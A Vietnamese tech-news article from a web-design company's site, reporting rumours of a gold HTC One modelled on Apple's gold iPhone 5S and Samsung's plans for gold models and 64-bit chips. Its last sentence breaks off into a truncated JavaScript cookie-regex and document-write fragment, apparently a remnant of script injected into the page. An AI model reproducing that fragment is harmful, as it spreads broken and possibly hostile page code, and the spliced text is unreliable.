Thiết Kế Web, Dịch Vụ Seo, Marketing Online > Tin tức > Tin công nghệ > HTC One sắp có phiên bản màu vàng tương tự iPhone 5S

HTC One sắp có phiên bản màu vàng tương tự iPhone 5S

Ngay sau khi đối thủ Apple cho ra mắt iPhone 5S với phiên bản màu vàng bên cạnh hai phiên bản màu truyền thống là trắng và đen, dường như hãng công nghệ Đài Loan HTC cũng đang rục rịch cho ra mắt phiên bản màu vàng của HTC One.

Tuần vừa rồi, trang công nghệ CtechCN vừa cho đăng tải những hình ảnh được cho là của chiếc HTC One màu vàng.

HTC cũng tham gia vào cuộc đua màu sắc

Hình ảnh HTC One màu vàng tương tự iPhone 5S

Trong bức hình vừa được đăng tải, chúng ta có thể thấy rất rõ phần khung viền phía cạnh trên và cạnh dưới màn hình có màu vàng champagne giống như trên iPhone 5S mà Apple đã trình làng.

Nguồn tin cung cấp bức ảnh đã khẳng định rằng đây chính là khung viền của chiếc HTC phiên bản màu vàng mà HTC chuẩn bị tung ra thị trường trong thời gian sắp tới.

HTC hiện là chiếc điện thoại cao cấp nhất của hãng công nghệ Đài Loan, đồng thời đây cũng là thiết bị nhận được nhiều phản hồi tích cực từ người dùng cả về thiết kế lẫn hiệu năng.

Apple lại có thêm đối thủ

iPhone 5S màu vàng được người dùng ưa chuộng hơn cả

Trước đây, khi thông tin về phiên bản màu vàng bị rò rỉ, HTC đã ra mắt người dùng chiếc HTC One với 4 màu sắc khác nhau gồm: trắng, đỏ, đen và mới đây nhất là màu xanh dương.

Vì vậy, rất nhiều ý kiến cho rằng, việc HTC One sẽ có thêm phiên bản màu vàng là điều hoàn toàn có thể xảy ra, nhất là sau khi Apple trình làng mẫu iPhone 5S phiên bản màu vàng và được người dùng đón nhận rất nhiệt tình.

Bên cạnh đó, một nguồn tin dấu tên đã khẳng định, Samsung cũng đang thảo luận về việc có nên đưa ra phiên bản màu vàng giống như iPhone 5S cho các thiết bị hiện tại của mình hay không?

Ngoài ra, sau khi việc Apple ra mắt iPhone 5S với bọ vi xử lý A7 chạy trên nền tảng cấu trúc 64 bit, CEO của Samsung cũng đã tuyên bố rằng, thế hệ smartphone kế tiếp của hãng cũng sẽ được trang bị chip 64 bit.

Và chúng ta có thể thấy rằng, mặc dù không thuyết phục được các nhà đầu tư, đã khiến giá cổ phiếu của Apple rớt giá thảm hại. Song, với những cải tiến về công nghệ và mẫu mã của hãng trên iPhone 5S và một lần nữa nó đang giúp Apple trở lại ngôi vị của người tạo nên xu hướng. (new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1”)+”= .write(‘